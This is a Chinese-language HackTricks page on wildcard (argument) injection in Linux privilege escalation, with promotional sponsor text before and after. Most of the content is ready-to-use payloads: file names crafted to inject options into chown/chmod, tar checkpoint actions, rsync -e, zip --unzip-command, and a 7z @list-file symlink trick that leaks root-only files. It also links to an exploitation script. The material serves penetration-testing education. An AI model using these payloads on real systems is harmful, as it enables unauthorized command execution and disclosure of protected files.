从零开始学习AWS黑客攻击直到成为专家 htARTE (HackTricks AWS 红队专家) 支持HackTricks的其他方式: * 如果您想在 **HackTricks中看到您的公司广告** 或 **下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取 [**官方PEASS & HackTricks商品**](https://peass.creator-spring.com) * 发现 [**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上 **关注** 我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
## chown, chmod 您可以**指定您想要复制给其余文件的文件所有者和权限** ```bash touch "--reference=/my/own/path/filename" ``` 您可以利用这个 [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(组合攻击)_\ __更多信息请见 [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Tar **执行任意命令:** ```bash touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh" ``` 您可以利用这个 [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar 攻击)_ __更多信息在 [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Rsync **执行任意命令:** ```bash Interesting rsync option from manual: -e, --rsh=COMMAND specify the remote shell to use --rsync-path=PROGRAM specify the rsync to run on remote machine ``` ```bash touch "-e sh shell.sh" ``` 您可以利用这个 [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) (_rsync 攻击_)\ __更多信息请见 [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## 7z 在 **7z** 中,即使在 `*` 前使用 `--`(注意 `--` 表示后续输入不能被当作参数处理,所以在这种情况下只是文件路径),您也可以引发一个任意错误来读取文件,因此,如果像下面这样的命令被 root 执行: ```bash 7za a /backup/$filename.zip -t7z -snl -p$pass -- * ``` 如果您可以在执行此操作的文件夹中创建文件,您可以创建文件`@root.txt`,并且文件`root.txt`是指向您想要读取的文件的**符号链接**: ```bash cd /path/to/7z/acting/folder touch @root.txt ln -s /file/you/want/to/read root.txt ``` 然后,当执行 **7z** 时,它会将 `root.txt` 当作一个包含它应该压缩的文件列表的文件(这就是 `@root.txt` 存在的意义),当7z读取 `root.txt` 时,它会读取 `/file/you/want/to/read`,**由于这个文件的内容不是文件列表,它会抛出错误**,显示内容。 _更多信息请参阅HackTheBox的CTF盒子Write-ups。_ ## Zip **执行任意命令:** ```bash zip name.zip files -T --unzip-command "sh -c whoami" ``` ```
从零到英雄学习AWS黑客技术,参加 htARTE (HackTricks AWS Red Team Expert) 支持HackTricks的其他方式: * 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
```